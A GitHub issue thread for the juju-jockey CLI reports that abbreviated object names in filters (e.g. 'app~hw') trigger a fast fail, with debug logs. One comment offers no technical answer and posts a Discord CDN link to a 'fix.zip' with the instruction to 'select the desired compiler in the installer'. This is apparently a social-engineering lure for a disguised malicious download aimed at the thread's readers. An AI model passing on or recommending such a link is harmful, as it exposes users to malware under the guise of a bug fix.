### ISSUE TITLE
Object name abbreviations not working in filters

### ISSUE THREAD

**Issue by LCVcode** [LCVcode/jockey#66]
## Describe the Bug
Filters that include an abbreviated object name trigger a fast fail (e.g. `juju-jockey -f ../juju-status.json app a~hw -vvv`).  Verbose output shows that the abbreviated object name is causing a field to not be found, resulting in a fast-fail in `filters.py`.  In this case, I am providing a local juju status file which was generated approximately six months ago.  That should not affect the result.  

## Expected Behavior
Abbreviations in filters should be translated to a homogeneous value an not trigger a fast fail.  

## Screenshots/Logs
Here is an example:
```
juju-jockey -f ../juju-status.json app app~hw -vvv
[17:31:46] DEBUG    Logger configured with level DEBUG                                                  __main__.py:65
           DEBUG    Traceback handler installed.                                                        __main__.py:71
           DEBUG    Parsed command-line arguments:                                                      __main__.py:82
                    Namespace(verbose=3, object='app', sudo=None, refresh=False,                                      
                    file=<_io.TextIOWrapper name='../juju-status.json' mode='r' encoding='UTF-8'>,                    
                    filters=['app~hw'])                                                                               
           DEBUG    Parsed object expression 'app' into Object.APPLICATION with field None              __main__.py:92
           DEBUG    Parsed filter 'app contains hw' with token '~' on expression 'app~hw'               filters.py:341
           DEBUG    Could not find field 'app', fast-failing filter                                     filters.py:306
[truncated]
           DEBUG    Could not find field 'app', fast-failing filter                                     filters.py:306
```
I would expect this command to return a single `hw-health` application name.  

Just to show that `hw-health` does exist in this status:
```
juju-jockey -f ../juju-status.json app | grep hw  
hw-health
```

## Environment
- **Operating system:**  N/A
- **Python version:** N/A
- **Juju version:**  N/A

**Comment by maher-nakesh** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by johnlettman** [comment]
Relates to #57, closing #57 would most likely close this.
